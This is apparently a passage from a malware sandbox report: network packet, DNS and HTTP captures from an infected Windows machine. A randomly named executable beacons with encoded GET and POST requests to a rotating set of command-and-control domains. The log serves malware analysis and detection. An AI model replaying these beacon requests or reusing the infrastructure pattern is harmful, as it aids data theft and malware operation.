                                                                                                            Dec 12, 2024 10:22:44.111175060 CET4919580192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:44.349597931 CET4919580192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:45.370650053 CET4919680192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:45.490041971 CET8049196217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:45.490103006 CET4919680192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:45.507126093 CET4919680192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:45.626651049 CET8049196217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:46.771797895 CET8049196217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:46.771863937 CET8049196217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:46.771945000 CET8049196217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:46.772124052 CET4919680192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:47.032728910 CET4919680192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:48.065143108 CET4919780192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:48.184736967 CET8049197217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:48.191235065 CET4919780192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:48.203142881 CET4919780192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:48.323288918 CET8049197217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:48.323303938 CET8049197217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:48.326210022 CET4919780192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:48.446197033 CET8049197217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:48.446213007 CET8049197217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:49.573703051 CET8049197217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:49.573735952 CET8049197217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:49.573774099 CET8049197217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:49.573797941 CET4919780192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:49.573858023 CET4919780192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:49.715903997 CET4919780192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:50.735047102 CET4919880192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:50.854547977 CET8049198217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:50.854706049 CET4919880192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:50.898576021 CET4919880192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:51.018076897 CET8049198217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:52.139718056 CET8049198217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:52.139734983 CET8049198217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:52.139744997 CET8049198217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:52.139754057 CET8049198217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:52.139774084 CET8049198217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:52.139786005 CET8049198217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:52.139889956 CET4919880192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:52.139889956 CET4919880192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:52.146217108 CET4919880192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:52.265531063 CET8049198217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:57.299331903 CET4919980192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:22:57.418812037 CET804919913.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:22:57.418886900 CET4919980192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:22:57.440946102 CET4919980192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:22:57.560323000 CET804919913.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:22:57.560381889 CET804919913.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:22:57.560386896 CET4919980192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:22:57.680082083 CET804919913.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:22:58.517735958 CET804919913.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:22:58.517748117 CET804919913.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:22:58.518579006 CET4919980192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:22:59.013556004 CET4919980192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:00.030478954 CET4920080192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:00.150639057 CET804920013.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:00.151175976 CET4920080192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:00.166151047 CET4920080192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:00.285578966 CET804920013.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:01.250957966 CET804920013.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:01.250996113 CET804920013.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:01.251058102 CET4920080192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:01.665554047 CET4920080192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:02.682390928 CET4920180192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:02.802135944 CET804920113.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:02.802544117 CET4920180192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:02.815015078 CET4920180192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:02.934669018 CET804920113.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:02.934695959 CET804920113.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:02.938091993 CET4920180192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:03.057595015 CET804920113.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:03.057607889 CET804920113.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:03.902789116 CET804920113.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:03.902928114 CET804920113.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:03.903000116 CET4920180192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:04.317553043 CET4920180192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:05.334836006 CET4920280192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:05.454554081 CET804920213.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:05.457645893 CET4920280192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:05.469290018 CET4920280192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:05.590600014 CET804920213.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:06.585774899 CET804920213.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:06.585844040 CET804920213.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:06.585920095 CET4920280192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:06.588057995 CET4920280192.168.2.2213.248.169.48
                                                                                                            Dec 12, 2024 10:23:06.707570076 CET804920213.248.169.48192.168.2.22
                                                                                                            Dec 12, 2024 10:23:11.988796949 CET4920380192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:12.111881018 CET804920381.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:12.112001896 CET4920380192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:12.125231981 CET4920380192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:12.245421886 CET804920381.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:12.245501041 CET4920380192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:12.245522022 CET804920381.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:12.364850044 CET804920381.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:13.404472113 CET804920381.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:13.404536009 CET804920381.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:13.404778957 CET4920380192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:13.631017923 CET4920380192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:14.646842003 CET4920480192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:14.766381979 CET804920481.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:14.766469955 CET4920480192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:14.780477047 CET4920480192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:14.899883032 CET804920481.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:16.058168888 CET804920481.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:16.058299065 CET804920481.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:16.058769941 CET4920480192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:16.282792091 CET4920480192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:17.299225092 CET4920580192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:17.419477940 CET804920581.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:17.427174091 CET4920580192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:17.444489956 CET4920580192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:17.565726995 CET804920581.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:17.565763950 CET804920581.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:17.565887928 CET4920580192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:17.686242104 CET804920581.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:17.686253071 CET804920581.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:18.719711065 CET804920581.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:18.825026989 CET804920581.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:18.825078964 CET4920580192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:18.950376034 CET4920580192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:19.967243910 CET4920680192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:20.086694002 CET804920681.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:20.086854935 CET4920680192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:20.097759008 CET4920680192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:20.217123032 CET804920681.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:21.379368067 CET804920681.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:21.379441023 CET804920681.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:21.384078026 CET4920680192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:21.384838104 CET4920680192.168.2.2281.2.196.19
                                                                                                            Dec 12, 2024 10:23:21.504900932 CET804920681.2.196.19192.168.2.22
                                                                                                            Dec 12, 2024 10:23:26.640429020 CET4920780192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:26.759856939 CET8049207172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:26.759933949 CET4920780192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:26.874097109 CET4920780192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:26.993510962 CET8049207172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:26.993562937 CET4920780192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:26.993571997 CET8049207172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:27.113168001 CET8049207172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:28.043258905 CET8049207172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:28.043275118 CET8049207172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:28.043338060 CET8049207172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:28.043387890 CET4920780192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:28.043541908 CET4920780192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:28.372808933 CET4920780192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:29.389194965 CET4920880192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:29.508771896 CET8049208172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:29.511334896 CET4920880192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:29.529061079 CET4920880192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:29.648416996 CET8049208172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:30.781925917 CET8049208172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:30.781943083 CET8049208172.67.215.235192.168.2.22
                                                                                                            Dec 12, 2024 10:23:30.781995058 CET4920880192.168.2.22172.67.215.235
                                                                                                            Dec 12, 2024 10:23:30.782459974 CET8049208172.67.215.235192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 12, 2024 10:20:14.487454891 CET | 8.8.8.8 | 192.168.2.22 | 0xc225 | No error (0) | www.zoiheat.xyz | redirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 10:20:14.487454891 CET | 8.8.8.8 | 192.168.2.22 | 0xc225 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 10:20:14.487454891 CET | 8.8.8.8 | 192.168.2.22 | 0xc225 | No error (0) | natroredirect.natrocdn.com |  | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:20:20.142815113 CET | 8.8.8.8 | 192.168.2.22 | 0x8325 | No error (0) | www.sqlite.org |  | 45.33.6.223 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:20:20.652255058 CET | 8.8.8.8 | 192.168.2.22 | 0x8325 | No error (0) | www.sqlite.org |  | 45.33.6.223 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:20:20.786238909 CET | 8.8.8.8 | 192.168.2.22 | 0x8325 | No error (0) | www.sqlite.org |  | 45.33.6.223 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:20:31.850424051 CET | 8.8.8.8 | 192.168.2.22 | 0x2825 | No error (0) | www.questmatch.pro |  | 188.114.97.6 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:20:31.850424051 CET | 8.8.8.8 | 192.168.2.22 | 0x2825 | No error (0) | www.questmatch.pro |  | 188.114.96.6 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:20:46.863133907 CET | 8.8.8.8 | 192.168.2.22 | 0xe690 | No error (0) | www.mrpokrovskii.pro |  | 85.25.177.138 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:21:01.407386065 CET | 8.8.8.8 | 192.168.2.22 | 0xa65a | Name error (3) | www.sodatool.site | none | none | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:21:02.573925018 CET | 8.8.8.8 | 192.168.2.22 | 0xd0ed | Name error (3) | www.sodatool.site | none | none | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:21:03.741609097 CET | 8.8.8.8 | 192.168.2.22 | 0x926c | Name error (3) | www.sodatool.site | none | none | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:21:04.903347015 CET | 8.8.8.8 | 192.168.2.22 | 0xb69c | Name error (3) | www.sodatool.site | none | none | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:21:10.329721928 CET | 8.8.8.8 | 192.168.2.22 | 0x5021 | Name error (3) | www.tb0.shop | none | none | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:21:13.774641991 CET | 8.8.8.8 | 192.168.2.22 | 0xc46f | Name error (3) | www.tb0.shop | none | none | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:21:17.446501970 CET | 8.8.8.8 | 192.168.2.22 | 0xfd30 | Name error (3) | www.tb0.shop | none | none | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:21:21.247852087 CET | 8.8.8.8 | 192.168.2.22 | 0x7701 | Name error (3) | www.tb0.shop | none | none | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:21:29.045106888 CET | 8.8.8.8 | 192.168.2.22 | 0xd94 | No error (0) | www.kvsj.net |  | 173.236.199.97 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:21:43.632327080 CET | 8.8.8.8 | 192.168.2.22 | 0x70b4 | No error (0) | www.learniit.info |  | 203.161.42.73 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:21:58.304864883 CET | 8.8.8.8 | 192.168.2.22 | 0xcc6 | No error (0) | www.bankseedz.info |  | 46.30.211.38 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:22:12.905580997 CET | 8.8.8.8 | 192.168.2.22 | 0xb45c | No error (0) | www.dietcoffee.online |  | 77.68.64.45 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:22:27.662798882 CET | 8.8.8.8 | 192.168.2.22 | 0x8554 | No error (0) | www.smartcongress.net | smartcongress.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 10:22:27.662798882 CET | 8.8.8.8 | 192.168.2.22 | 0x8554 | No error (0) | smartcongress.net |  | 146.88.233.115 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:22:42.701673031 CET | 8.8.8.8 | 192.168.2.22 | 0x1bbb | No error (0) | www.carsten.studio | carsten.studio |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 10:22:42.701673031 CET | 8.8.8.8 | 192.168.2.22 | 0x1bbb | No error (0) | carsten.studio |  | 217.160.0.200 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:22:57.297498941 CET | 8.8.8.8 | 192.168.2.22 | 0x6d9d | No error (0) | www.krshop.shop |  | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:22:57.297498941 CET | 8.8.8.8 | 192.168.2.22 | 0x6d9d | No error (0) | www.krshop.shop |  | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:23:11.985996008 CET | 8.8.8.8 | 192.168.2.22 | 0xda8c | No error (0) | www.rysanekbeton.cloud | rysanekbeton.cloud |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 10:23:11.985996008 CET | 8.8.8.8 | 192.168.2.22 | 0xda8c | No error (0) | rysanekbeton.cloud |  | 81.2.196.19 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:23:26.638597012 CET | 8.8.8.8 | 192.168.2.22 | 0xe617 | No error (0) | www.airrelax.shop |  | 172.67.215.235 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:23:26.638597012 CET | 8.8.8.8 | 192.168.2.22 | 0xe617 | No error (0) | www.airrelax.shop |  | 104.21.16.206 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:23:42.236202955 CET | 8.8.8.8 | 192.168.2.22 | 0xd38a | No error (0) | www.vayui.top |  | 172.67.145.234 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:23:42.236202955 CET | 8.8.8.8 | 192.168.2.22 | 0xd38a | No error (0) | www.vayui.top |  | 104.21.95.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 10:23:57.508109093 CET | 8.8.8.8 | 192.168.2.22 | 0xf189 | No error (0) | www.diozusemails.buzz |  | 69.48.179.238 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49165 | 85.159.66.93 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:20:14.655329943 CET | 540 | OUT | GET /ti6k/?e2E=wRQ8oHXx&x4=aooN9XnxZY5vLLqjRSo6DpWN4fgsD3CW9S/CD7OrytslWQsmx2XgIWNhq2ot6qnFvMzcVXyCAoOGhogdqicJCN8EOoBxC+Cz12DK8fUp+S6/f8QxRRTszX5C8Y75 HTTP/1.1
Host: www.zoiheat.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 12, 2024 10:20:15.986624002 CET | 225 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.1
Date: Thu, 12 Dec 2024 09:20:15 GMT
Content-Length: 0
Connection: close
X-Rate-Limit-Limit: 5s
X-Rate-Limit-Remaining: 19
X-Rate-Limit-Reset: 2024-12-12T09:20:20.7730248Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49166 | 45.33.6.223 | 80 | 3736 | C:\Windows\SysWOW64\msinfo32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:20:20.920856953 CET | 291 | OUT | GET /2019/sqlite-dll-win32-x86-3270000.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Host: www.sqlite.org
Connection: Keep-Alive
Cache-Control: no-cache
Dec 12, 2024 10:20:22.073776007 CET | 249 | IN | HTTP/1.1 200 OK
Connection: keep-alive
Date: Thu, 12 Dec 2024 09:20:21 GMT
Last-Modified: Fri, 08 Feb 2019 13:45:40 GMT
Cache-Control: max-age=120
ETag: "m5c5d8804s75419"
Content-type: application/zip; charset=utf-8
Content-length: 480281


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49167 | 188.114.97.6 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:20:31.988941908 CET | 2472 | OUT | POST /1yxc/ HTTP/1.1
Host: www.questmatch.pro
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.questmatch.pro
Referer: http://www.questmatch.pro/1yxc/
Content-Length: 2159
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 12, 2024 10:20:33.240324020 CET | 1236 | IN | HTTP/1.1 404
Date: Thu, 12 Dec 2024 09:20:33 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
X-Correlation-ID: a9c98ab6-ff4c-4420-960a-3f6c4150e61d
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
CF-Connecting-IP: 8.46.123.175
CF-IPCountry: US
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T0LoelQiyAh3%2Fck2w7eEEFiO33fPjZz1k2vxOqV2rmz8%2B6LRrA%2BwsmwsBcMxyNaaQciJkaBfI7BrcB0OLeHKmcA5dS31F0kLKQVG23UHgbxwHEOrR8PZtfM1nptnAAxfMCb6Q%2FM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f0ca39daff8f791-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1477&min_rtt=1477&rtt_var=738&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2772&delivery_rate=0&cwnd=120&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49168 | 188.114.97.6 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:20:34.645442009 CET | 811 | OUT | POST /1yxc/ HTTP/1.1
                                                                                                            Host: www.questmatch.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.questmatch.pro
                                                                                                            Referer: http://www.questmatch.pro/1yxc/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Ascii: x4=hPHW3D6UD6FbXPsUI3lgc+GsaCQkIa5cCAWpdEOpTL+gh9WahE/rwPR5T2O/RuBG4tLRQrewHsII/wFx8+2YEfzPNTlotVETpEIUbRU5+FfcrqjwFVtKiUuJao/SF55SfiRXvraj5eulPVOfSNmGH0r2fpR/g07QtzBsxtOJchy27zSZw+7I8Vo2V24aT9waUg==
Dec 12, 2024 10:20:35.908523083 CET | 1236 | IN | HTTP/1.1 404
                                                                                                            Date: Thu, 12 Dec 2024 09:20:35 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Origin
                                                                                                            Vary: Access-Control-Request-Method
                                                                                                            Vary: Access-Control-Request-Headers
                                                                                                            X-Correlation-ID: 09c40d58-d18c-4f92-b833-326380c1bb17
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: 0
                                                                                                            CF-Connecting-IP: 8.46.123.175
                                                                                                            CF-IPCountry: US
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hmaArIK2uCa1Lw%2BeEjEm4qtTKF2nc%2B0fKMHRnweSYUzUFNISeKCCYCXIGglPdKIzIGofrsfJN1IX8gFlfG12yLDabE99C4Ck0eEfPbLHGPKgCCs%2BVYheTcL9uL%2B1y82ImTBUJBY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca3ae4d9b43d0-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1716&rtt_var=858&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=811&delivery_rate=0&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 12, 2024 10:20:35.908814907 CET | 106 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.22 | 49169 | 188.114.97.6 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:20:37.306662083 CET | 2472 | OUT | POST /1yxc/ HTTP/1.1
                                                                                                            Host: www.questmatch.pro
